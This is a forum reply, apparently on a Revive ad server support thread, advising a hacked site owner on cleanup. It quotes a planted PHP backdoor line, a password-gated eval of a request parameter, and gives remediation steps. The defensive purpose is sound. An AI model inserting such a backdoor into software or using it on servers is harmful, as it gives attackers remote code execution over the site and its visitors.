Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php
Problably it has been modified, adding a line like this at the end:
if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}
You have to remove it.
Also you have to search in the "images folder", for some php script ... and remove it. Perhaps you can send it privately to @Ian vM
Clean the prepend code of your zones ... via sql o through the revive backend. Search for iframes and javascript codes.
Disable PHP execution on image folder or move image folder to "another place" as they are static files and serve them throught another subdomain. You don't need PHP for them
